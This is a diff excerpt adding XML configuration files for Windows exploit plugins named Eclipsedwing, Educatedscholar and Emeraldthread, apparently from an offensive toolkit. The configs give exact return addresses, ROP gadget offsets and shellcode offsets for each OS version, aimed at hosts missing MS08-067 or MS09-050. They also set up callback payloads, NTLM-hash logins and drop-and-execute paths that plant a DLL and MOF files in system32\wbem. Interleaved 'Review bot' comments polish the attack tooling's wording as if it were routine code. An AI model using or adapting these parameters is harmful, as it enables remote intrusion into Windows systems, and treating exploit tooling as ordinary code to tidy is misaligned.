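+<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
+<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
+<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
+<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="XPSP1" description="Windows XP, Service Pack 1">
+<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
+<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
+<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
+<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
+<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="XPSP2" description="Windows XP, Service Pack 2">
+<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
+<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x0ffd0000" hidden="true"/>
+<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x7A31" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CommonRetValue" description="" type="U32" value="0x1095F" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="InitialEcxValue" description="" type="U32" value="0x24588" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0xA08D" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxPtrValue" description="" type="U32" value="0x0ffe131E" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1A5A1" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x1AAD5" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxPtrValue" description="" type="U32" value="0x2458C" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x1E64D" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
+<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x135BE" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x14D7C" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x24590" hidden="true"/> <!-- offset from base address -->
+<!-- non-prefix parameters -->
+<t:parameter name="PtrRet18Value" description="" type="U32" value="0xcc39" hidden="true"/>
+<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x22064" hidden="true"/>
+<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2251f" hidden="true"/>
+<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0xEFDF" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x24588" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CallEcxValue" description="" type="U32" value="0x134B0" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000011" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
+<!-- 50 c3 -->
+<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x135cb" hidden="true"/>
+<!-- 8d 6c 24 10 2b e0 -->
+<t:parameter name="GetStackPtr" description="" type="U32" value="0x135e8" hidden="true"/>
+<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x00000089" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
+</t:paramgroup>
+
+<t:paramgroup name="XPSP3" description="Windows XP, Service Pack 3">
+<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
+<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x82c9" hidden="true"/>
+<t:parameter name="CommonRetValue" description="" type="U32" value="0x121de" hidden="true"/>
+<t:parameter name="InitialEcxValue" description="" type="U32" value="0x32020" hidden="true"/>
+<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0xA965" hidden="true"/>
+<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6802c91f" hidden="true"/>
+<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1fce1" hidden="true"/>
+<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x20395" hidden="true"/>
+<t:parameter name="EbxPtrValue" description="" type="U32" value="0x32024" hidden="true"/>
+<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x24f9b" hidden="true"/>
+<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
+<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x14f5e" hidden="true"/>
+<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x11740" hidden="true"/>
+<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x32028" hidden="true"/> <!-- offset from base address -->
+<!-- non-prefix parameters -->
+<t:parameter name="PtrRet18Value" description="" type="U32" value="0xfe47" hidden="true"/>
+<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x31486" hidden="true"/>
+<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2f9f7" hidden="true"/>
+<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x1006b" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x32020" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CallEcxValue" description="" type="U32" value="0x14e57" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000011" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
+<!-- 50 c3 -->
+<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x14f6b" hidden="true"/>
+<!-- 8d 6c 24 10 2b e0 -->
+<t:parameter name="GetStackPtr" description="" type="U32" value="0x14f88" hidden="true"/>
+<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x00000089" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
+</t:paramgroup>
+
+<t:paramgroup name="W2K3SP0" description="Windows 2003, Service Pack 0">
+<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
+<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffcd3" hidden="true"/>
+<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff36" hidden="true"/>
+<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
+<t:parameter name="CallESP" description="" type="U32" value="0x001a762f" hidden="true"/>
+</t:paramgroup>
+
+<t:paramgroup name="W2K3SP1" description="Windows 2003, Service Pack 1">
+<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
+<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x8430" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CommonRetValue" description="" type="U32" value="0x12ce6" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="InitialEcxValue" description="" type="U32" value="0x2ba08" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0x92a1" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6800cb52" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x21899" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x21dd5" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxPtrValue" description="" type="U32" value="0x2ba0C" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x25a5f" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
+<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x15ccc" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x63eb" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x2ba10" hidden="true"/> <!-- offset from base address -->
+<!-- non-prefix parameters -->
+<t:parameter name="PtrRet18Value" description="" type="U32" value="0xd9f7" hidden="true"/>
+<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x291c4" hidden="true"/>
+<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x2b34f" hidden="true"/>
+<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x108f0" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x2ba08" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CallEcxValue" description="" type="U32" value="0x15bb5" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000012" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
+<!-- 50 c3 -->
+<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x15cb1" hidden="true"/>
+<!-- 8d 6c 24 10 2b e0 -->
+<t:parameter name="GetStackPtr" description="" type="U32" value="0x15cf4" hidden="true"/>
+<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x0000008f" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
+</t:paramgroup>
+
+<t:paramgroup name="W2K3SP2" description="Windows 2003, Service Pack 2">
+<t:parameter name="ShellcodeOffset" description="" type="U32" value="0x78" hidden="true"/>
+<t:parameter name="RsaenhBaseAddress" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="UnpatchedRetValue" description="" type="U32" value="0x8520" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CommonRetValue" description="" type="U32" value="0x12f87" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="InitialEcxValue" description="" type="U32" value="0x312c0" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="LoadEaxPtrValue" description="" type="U32" value="0x9391" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxPtrValue" description="" type="U32" value="0x6800cc44" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="AddEaxPtrEdxValue" description="" type="U32" value="0x1fbd9" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxToWriteableValue" description="" type="U32" value="0x202b5" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EbxPtrValue" description="" type="U32" value="0x312c4" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="MovHeapPtrToEcxValue" description="" type="U32" value="0x24e68" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="EaxNegValValue" description="" type="U32" value="0xFFFFFF30" hidden="true"/>
+<t:parameter name="MovEcxEspValue" description="" type="U32" value="0x1607c" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetAddrValue" description="" type="U32" value="0x124e3" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="HeapRetEbpValue" description="" type="U32" value="0x312c8" hidden="true"/> <!-- offset from base address -->
+<!-- non-prefix parameters -->
+<t:parameter name="PtrRet18Value" description="" type="U32" value="0x6999" hidden="true"/>
+<t:parameter name="PtrRwSizeValue" description="" type="U32" value="0x3046e" hidden="true"/>
+<t:parameter name="PtrRwSizeValue2" description="" type="U32" value="0x30667" hidden="true"/>
+<t:parameter name="GetExecutionToBufferValue" description="" type="U32" value="0x10b1c" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="WriteMemoryValue" description="" type="U32" value="0x312c0" hidden="true"/> <!-- offset from base address -->
+<t:parameter name="CallEcxValue" description="" type="U32" value="0x15f68" hidden="true"/> <!-- offset from base address -->
+<!-- 50 c3 -->
+<t:parameter name="CallEaxRetValue" description="" type="U32" value="0x16061" hidden="true"/>
+<!-- 8d 6c 24 10 2b e0 -->
+<t:parameter name="GetStackPtr" description="" type="U32" value="0x160a4" hidden="true"/>
+<t:parameter name="NtAllocatePtr" description="" type="U32" value="0x00000012" hidden="true"/> <!-- address of kernel32.dll import of NtAllocateVirtualMemory -->
+<t:parameter name="SyscallVProtectValue" description="" type="U32" value="0x0000008f" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
+</t:paramgroup>
+</t:paramchoice>
+</t:inputparameters>
+
+<t:outputparameters>
+<t:parameter name="Contract"
+description="Plugin contract"
+type="String"
+value="StagedUpload"/>
+<t:paramchoice
+name="Payload"
+description="Comms method">
+<t:paramgroup name="ConnectedSocket" description="traditional">
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to target"
+type="Socket"/>
+</t:paramgroup>
+<t:paramgroup name="RPCProxy" description="traditional">
+<t:parameter name="Protocol"
+description="Protocol to proxy with"
+type="String"/>
+</t:paramgroup>
+</t:paramchoice>
+
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="Tcp"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="TargetPort"
+closeoncompletion="true"/>
+<t:remote protocol="Tcp"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</t:redirection>
+
+<t:logic>
+<t:and>
+<t:or>
+<t:service name="smb">
+<t:bindtovalue name="Protocol" value="SMB"/>
+<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
+</t:service>
+<t:service name="nbt">
+<t:bindtovalue name="Protocol" value="NBT"/>
+<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
+</t:service>
+</t:or>
+<t:or>
+<t:os family="windows" name="Windows 2000">
+<t:bindtovalue name="Target" value="W2K"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="0">
+<t:bindtovalue name="Target" value="XPSP0"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="1">
+<t:bindtovalue name="Target" value="XPSP1"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="2">
+<t:bindtovalue name="Target" value="XPSP2"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="3">
+<t:bindtovalue name="Target" value="XPSP3"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="0">
+<t:bindtovalue name="Target" value="W2K3SP0"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="1">
+<t:bindtovalue name="Target" value="W2K3SP1"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="2">
+<t:bindtovalue name="Target" value="W2K3SP2"/>
+</t:os>
+</t:or>
+<t:not>
+<t:os_patch name="MS08-67"/>
+</t:not>
+<t:bindtovalue name="Payload" value="Callback"/>
+</t:and>
+</t:logic>
+
+</t:config>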
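Review bot: The user-facing text of the input-side `Payload` paramchoice has a typo and is stale: `description="Listen or Callback paylaod"` should at least read `description="Listen or Callback payload"`, and since the Listener group is commented out and the only selectable groups are Callback and RPCReuse, `description="Callback or RPC proxy payload"` would describe what the operator actually sees. On the output side the two `Payload` groups `ConnectedSocket` and `RPCProxy` both carry `description="traditional"`, which looks like a copy-paste leftover; the second should say something like `description="RPC proxy"`. The `Target` paramchoice description also promises "Language of target OS" but none of its groups are language-specific, so that wording could be dropped.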
BIN
windows/exploits/Eclipsedwing-1.5.2.exe
Normal file
Binary file not shown.
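--- a/windows/exploits/Educatedscholar-1.0.0.0.fb
+++ b/windows/exploits/Educatedscholar-1.0.0.0.fb
@@ -0,0 +1,27 @@
+<?xml version="1.0"?>
+<t:config id="2207e94cf3dca3559c5711a307a3f84aafa6247c"
+name="Educatedscholar"
+version="1.0.0"
+configversion="1.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Rpctouch"
+displayname="RPC Touch"
+postmessage="EDSC requires target OS">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:iparam name="Protocol" value="SMB"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="Protocol" value="Protocol"/>
+</t:plugin>
+<t:plugin name="Educatedscholartouch"
+displayname="EDSC Vulnerability Touch"
+postmessage="EDSC exploits a public vulnerability">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="Protocol" value="Protocol"/>
+</t:plugin>
+</t:touchlist>
+</t:config>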
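Review bot: Both `t:plugin` entries in this touchlist omit the `description` attribute that the sibling Eclipsedwing touchlist gives each of its plugins (`description="Touch to get Target OS"`, `description="Check if Target is vulnerable to ECWI"`), so the purpose of each touch is only implied by its `displayname`. The second plugin's `postmessage="EDSC exploits a public vulnerability"` also reads as a remark rather than the failure message the other touchlists use (`"... requires ..."`); a line such as `postmessage="EDSC requires vulnerable target"` would keep the two plugins and the sibling files consistent.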
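--- a/windows/exploits/Educatedscholar-1.0.0.0.xml
+++ b/windows/exploits/Educatedscholar-1.0.0.0.xml
@@ -0,0 +1,149 @@
+<?xml version="1.0"?>
+<t:config id="2207e94cf3dca3559c5711a307a3f84aafa6247c"
+name="Educatedscholar"
+version="1.0.0"
+configversion="1.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:inputparameters>
+<t:parameter name="TargetIp"
+description="Target IP Address"
+type="IPv4"
+binding="//identifier"/>
+<t:parameter name="TargetPort"
+description="Port used by SMB"
+type="TcpPort"
+binding="//service[name='smb']/port"/>
+
+<t:parameter name="CallbackIp"
+description="Callback IP Address"
+type="IPv4"/>
+<t:parameter name="CallbackPort"
+description="Callback port"
+type="TcpPort"
+default="0"/>
+<t:parameter name="CallbackLocalPort"
+description="Local callback port"
+type="TcpPort"
+required="false"/>
+<t:parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
+type="S16"
+default="60"/>
+<t:parameter name="PacketDelay"
+description="Milliseconds for delay between memory write packets"
+type="U16"
+hidden="true"
+value="150"/>
+
+<!-- Need to differentiate between x86 and 64bit -->
+<t:paramchoice name="Target" description="Target OS Version">
+<t:paramgroup name="VistaSP1" description="">
+<t:parameter name="ProcessIDHigh" description="" type="U16"
+value="0x01BB" hidden="true"/>
+<t:parameter name="ReturnAddress" description="" type="U32"
+value="0xffdf0908" hidden="true"/>
+<t:parameter name="HeaderWriteOffset" description="" type="U32"
+value="0x3fffffe6" hidden="true"/>
+<t:parameter name="ReadWriteAddress" description="" type="U32"
+value="0xffdf0d04" hidden="true"/>
+<t:parameter name="SetBitAddress" description="" type="U32"
+value="0xffdf0770" hidden="true"/>
+<t:parameter name="ReadAddress" description="" type="U32"
+value="0xffdf02f4" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="VistaSP2" description="">
+<t:parameter name="ProcessIDHigh" description="" type="U16"
+value="0x01BB" hidden="true"/>
+<t:parameter name="ReturnAddress" description="" type="U32"
+value="0xffdf0908" hidden="true"/>
+<t:parameter name="HeaderWriteOffset" description="" type="U32"
+value="0x3fffffe7" hidden="true"/>
+<t:parameter name="ReadWriteAddress" description="" type="U32"
+value="0xffdf0d04" hidden="true"/>
+<t:parameter name="SetBitAddress" description="" type="U32"
+value="0xffdf0770" hidden="true"/>
+<t:parameter name="ReadAddress" description="" type="U32"
+value="0xffdf02f4" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="2K8SP1" description="">
+<t:parameter name="ProcessIDHigh" description="" type="U16"
+value="0x01BB" hidden="true"/>
+<t:parameter name="ReturnAddress" description="" type="U32"
+value="0xffdf0908" hidden="true"/>
+<t:parameter name="HeaderWriteOffset" description="" type="U32"
+value="0x3fffffe6" hidden="true"/>
+<t:parameter name="ReadWriteAddress" description="" type="U32"
+value="0xffdf0d04" hidden="true"/>
+<t:parameter name="SetBitAddress" description="" type="U32"
+value="0xffdf0770" hidden="true"/>
+<t:parameter name="ReadAddress" description="" type="U32"
+value="0xffdf02f4" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="2K8SP2" description="">
+<t:parameter name="ProcessIDHigh" description="" type="U16"
+value="0x01BB" hidden="true"/>
+<t:parameter name="ReturnAddress" description="" type="U32"
+value="0xffdf0908" hidden="true"/>
+<t:parameter name="HeaderWriteOffset" description="" type="U32"
+value="0x3fffffe7" hidden="true"/>
+<t:parameter name="ReadWriteAddress" description="" type="U32"
+value="0xffdf0d04" hidden="true"/>
+<t:parameter name="SetBitAddress" description="" type="U32"
+value="0xffdf0770" hidden="true"/>
+<t:parameter name="ReadAddress" description="" type="U32"
+value="0xffdf02f4" hidden="true"/>
+</t:paramgroup>
+</t:paramchoice>
+
+</t:inputparameters>
+<t:outputparameters>
+<t:parameter name="Contract"
+description="The contract fulfilled by this plugin"
+type="String"
+value="StagedUpload"/>
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to target"
+type="Socket"/>
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+
+</t:outputparameters>
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='smb']/port"
+closeoncompletion="true"/>
+<t:remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</t:redirection>
+<t:logic>
+<t:and>
+<t:service name="smb">
+<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
+</t:service>
+<t:or>
+<t:os family="windows" name="Windows Vista" servicepack="1">
+<t:bindtovalue name="Target" value="VistaSP1"/>
+</t:os>
+<t:os family="windows" name="Windows Vista" servicepack="2">
+<t:bindtovalue name="Target" value="VistaSP2"/>
+</t:os>
+<t:os family="windows" name="Windows 2008" servicepack="1">
+<t:bindtovalue name="Target" value="2K8SP1"/>
+</t:os>
+<t:os family="windows" name="Windows 2008" servicepack="2">
+<t:bindtovalue name="Target" value="2K8SP2"/>
+</t:os>
+</t:or>
+<t:not>
+<t:os_patch name="MS09-050"/>
+</t:not>
+</t:and>
+</t:logic>
+</t:config>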
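Review bot: The `Target` paramchoice is operator-visible (it has no `hidden` attribute and the `t:logic` block binds it from the detected OS), yet all four of its groups ship with `description=""`, so the selection list shows bare group names; one-line descriptions such as `description="Windows Vista, Service Pack 1"` on each group would match the style used for the `Target` groups in the sibling Eclipsedwing config. The `<!-- Need to differentiate between x86 and 64bit -->` comment above that choice records an open item without an owner or marker; something like `<!-- TODO(owner): groups do not yet distinguish x86 from x64 builds -->` keeps it from being read as a description of current behaviour. The output-side `XorMask` parameter likewise carries `description=""` while its neighbours are documented.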
BIN
windows/exploits/Educatedscholar-1.0.0.exe
Normal file
Binary file not shown.
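--- a/windows/exploits/Emeraldthread-3.0.0.0.fb
+++ b/windows/exploits/Emeraldthread-3.0.0.0.fb
@@ -0,0 +1,20 @@
+<?xml version="1.0"?>
+<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
+name="Emeraldthread"
+version="3.0.0"
+configversion="3.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Emeraldthreadtouch"
+displayname="Emeraldthread Touch"
+description="Touch to get Target Printer"
+postmessage="EMTH requires Printer name">
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="Protocol" value="Protocol"/>
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="Credentials" value="Credentials"/>
+<t:oparam name="PrinterName" value="PrinterName"/>
+</t:plugin>
+</t:touchlist>
+</t:config>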
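--- /dev/null
+++ b/windows/exploits/Emeraldthread-3.0.0.0.xml
@@ -0,0 +1,240 @@
+<?xml version="1.0"?>
+<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
+name="Emeraldthread"
+version="3.0.0"
+configversion="3.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:inputparameters>
+<t:parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
+type="S16"
+default="60" />
+<t:parameter name="TargetIp"
+description="Target IP Address"
+type="IPv4"
+binding="//identifier"/>
+<t:paramchoice name="Protocol"
+default="SMB"
+description="Protocol to connect to target with">
+<t:paramgroup name="SMB"
+description="SMB over TCP">
+<t:parameter name="TargetPort"
+description="Port used by SMB"
+type="TcpPort"
+default="445"/>
+</t:paramgroup>
+<t:paramgroup name="NBT"
+description="Netbios over TCP">
+<t:parameter name="TargetPort"
+description="Port used by Netbios"
+type="TcpPort"
+default="139"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:paramchoice name="Credentials"
+description="Type of credentials to use">
+<t:paramgroup name="Anonymous"
+description="Anonymous (NULL session)"/>
+<t:paramgroup name="Guest"
+description="Guest account"/>
+<t:paramgroup name="No password"
+description="User account with no password set">
+<t:parameter name="Username"
+description=""
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="Password"
+description="Username and password">
+<t:parameter name="Username"
+description=""
+type="UString"/>
+<t:parameter name="Password"
+description=""
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="NTLM hash"
+description="Username and NTLM hash">
+<t:parameter name="Username"
+description=""
+type="UString"/>
+<t:parameter name="NTLMHash"
+description="NTLM password hash (in hex)"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="Both hashes"
+description="Username, NTLM hash, and LANMAN hash">
+<t:parameter name="Username"
+description=""
+type="UString"/>
+<t:parameter name="NTLMHash"
+description="NTLM password hash (in hex)"
+type="UString"/>
+<t:parameter name="LANMANHash"
+description="LANMAN password hash (in hex)"
+type="UString"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:paramchoice name="PayloadType"
+description="Callback from target or callin to target"
+default="Callback">
+<t:paramgroup name="Callback"
+description="Target calls back to plugin">
+<t:parameter name="CallbackIp"
+description="Callback IP address"
+type="IPv4"/>
+<t:parameter name="CallbackPort"
+description="Callback port"
+type="TcpPort"
+default="0"/>
+<t:parameter name="CallbackLocalPort"
+description="Local callback port"
+type="TcpPort"
+required="false"/>
+</t:paramgroup>
+<t:paramgroup name="Callin"
+description="Target waits for call from plugin">
+<t:parameter name="ListenPort"
+description="Listen port"
+type="TcpPort"/>
+<t:parameter name="ListenLocalPort"
+description="Listen port"
+type="TcpPort"
+required="false"/>
+<t:parameter name="ListenWait"
+description="Timeout to wait before trying to connect in."
+type="S16"
+default="10"/>
+</t:paramgroup>
+<t:paramgroup name="DropAndExecute"
+description="Payload deployed with no feedback">
+<t:parameter name="PayloadContract"
+description="Passthrough contract"
+type="String"
+required="false"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:paramchoice name="PayloadSource"
+description="Payload source input type"
+default="File">
+<t:paramgroup name="File"
+description="Payloads provided by file">
+<t:parameter name="UnconfiguredDLL"
+description="The unconfigured DLL file that will be written to target"
+type="LocalFile"
+default="esud.dll"/>
+<t:parameter name="ConfiguredMOF"
+description="The patched mof file that will be written to target"
+type="LocalFile"
+default="nnetcfg.mof"/>
+</t:paramgroup>
+<t:paramgroup name="Inline"
+description="Payloads provided inline">
+<t:parameter name="DLLBuffer"
+description="The unconfigured DLL file that will be written to target"
+type="UString"
+required="false"/>
+<t:parameter name="MOFBuffer"
+description="The patched mof file that will be written to target"
+type="UString"
+required="false"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:parameter name="RemoteDLLPath"
+description="The path where we want the DLL to exist on target"
+type="String"
+default="\windows\system32\wbem\wbemess2.tlb"/>
+<t:parameter name="RemoteMOFPath"
+description="The path where we want the patched mof file to exist on target"
+type="String"
+default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
+<t:parameter name="RemoteMOFTriggerPath"
+description="The path where we want the mof trigger file to exist on target"
+type="String"
+default="\windows\system32\wbem\.\mof\evntprv.mof"/>
+<t:parameter name="PrinterName"
+description="The name of the printer on target"
+type="UString"
+format="Scalar"/>
+</t:inputparameters>
+
+<t:outputparameters>
+<t:paramchoice name="PayloadType"
+description="Payload type determines contract">
+<t:paramgroup name="StagedUpload"
+description="Callin or Callback">
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to target"
+type="Socket"/>
+<t:parameter name="Contract"
+description="Plugin contract"
+type="String"
+value="StagedUpload"/>
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+</t:paramgroup>
+<t:paramgroup name="DropAndExecute"
+description="">
+<t:parameter name="Contract"
+description="Plugin contract"
+type="String"/>
+</t:paramgroup>
+</t:paramchoice>
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="Tcp"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="TargetPort"
+closeoncompletion="false"/>
+<t:local protocol="Tcp"
+listenaddr="TargetIp"
+listenport="ListenLocalPort"
+destaddr="//identifier"
+destport="ListenPort"/>
+<t:remote protocol="Tcp"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</t:redirection>
+
+<t:logic>
+<t:and>
+<t:or>
+<t:service name="smb">
+<t:bindtovalue name="Protocol" value="SMB"/>
+<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
+</t:service>
+<t:service name="nbt">
+<t:bindtovalue name="Protocol" value="NBT"/>
+<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
+</t:service>
+</t:or>
+<t:or>
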